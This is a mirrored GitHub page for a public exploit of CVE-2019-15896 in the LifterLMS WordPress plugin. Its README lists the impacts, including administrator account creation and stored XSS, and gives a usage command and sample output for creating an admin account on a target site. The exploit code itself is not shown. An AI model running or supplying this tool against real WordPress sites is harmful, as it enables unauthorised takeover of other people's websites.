https://github.com/randomrobbiebf/cve-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import
https://github.com/randomrobbiebf/cve-2019-15896
Last synced: 8 months ago
JSON representation
LifterLMS <= 3.34.5 - Unauthenticated Options Import
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2019-15896
- Owner: RandomRobbieBF
- License: gpl-3.0
- Created: 2023-08-22T18:56:09.000Z (almost 3 years ago)
- Default Branch: main
- Last Pushed: 2023-08-22T18:59:15.000Z (almost 3 years ago)
- Last Synced: 2025-09-22T14:02:23.959Z (9 months ago)
- Language: Python
- Size: 17.6 KB
- Stars: 0
- Watchers: 1
- Forks: 1
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# CVE-2019-15896
LifterLMS <= 3.34.5 - Unauthenticated Options Import
# Description
Unauthenticated Options Import, which could lead to
- Website Redirection
- Administrator Account Creation
- Content Injection
- Stored XSS
The issues have been reported as fixed in 3.35.0. However v3.35.1 added additional input sanitisation and filtering.
How to use
---
$ python3 CVE-2019-15896.py --url http://wordpress.lan --username radmin --email admin@admin.lan
LifterLMS <= 3.34.5 - Unauthenticated Options Import
Exploit By Ramdom Robbie
Once ran check your email for the forgotten password link.
Password reset email sent to admin@admin.lan
```
Info
---
```
Requires access to login.php and working email address and the site needs to be able to send emails
```